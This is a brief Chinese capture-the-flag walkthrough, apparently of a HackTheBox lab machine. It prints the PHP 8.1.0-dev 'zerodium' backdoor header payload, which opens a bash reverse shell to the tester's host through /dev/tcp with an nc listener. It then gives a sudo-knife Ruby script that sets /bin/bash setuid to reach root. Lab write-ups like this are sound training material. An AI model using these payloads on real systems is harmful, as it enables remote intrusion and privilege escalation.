1.nmap -sC -sV 10.10.10.242 //常规扫 22,80端口
2.wappalyzer扫指纹 注意到PHP版本是8.1.0-dev
这个版本的PHP最近被爆出来存在远程代码执行漏洞
具体看这个:https://zhuanlan.zhihu.com/p/381142917
直接上payload User-Agentt: zerodiumsystem("/bin/bash -c ‘bash -i >&/dev/tcp/10.10.14.113/6666 0>&1’");
kali开始监听:nc -lvvp 6666
得到反弹shell:
cd /home/james
cat user.txt
拿到第一个flag
下面就是提权,日常sudo -l
发现可以无密执行/usr/bin/knife
cat一下发现是一个ruby脚本
运行一下发现提示需要执行系统命令(搜了一下ruby knife大概就是一个ruby包,看成一个ruby脚本就行)
ruby执行命令方法exec
写一个rb脚本:echo “system(‘chmod +s /bin/bash’)” > exploit.rb //setuid提权
sudo /usr/bin/knife exec exploit.rb //给bash setuid权限
/bin/bash -p//–posix 这个指令是需要用到root权限的,由于设置了setuid所以实现了提权
拿到root权限了就直接到/root目录下拿flag就行了
本文详细记录了利用nmap进行端口扫描,发现PHP 8.1.0-dev的远程代码执行漏洞,通过构造payload获取反弹shell,然后使用sudo和ruby执行脚本来提权至root权限的过程,最终成功访问/root目录获取flag。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
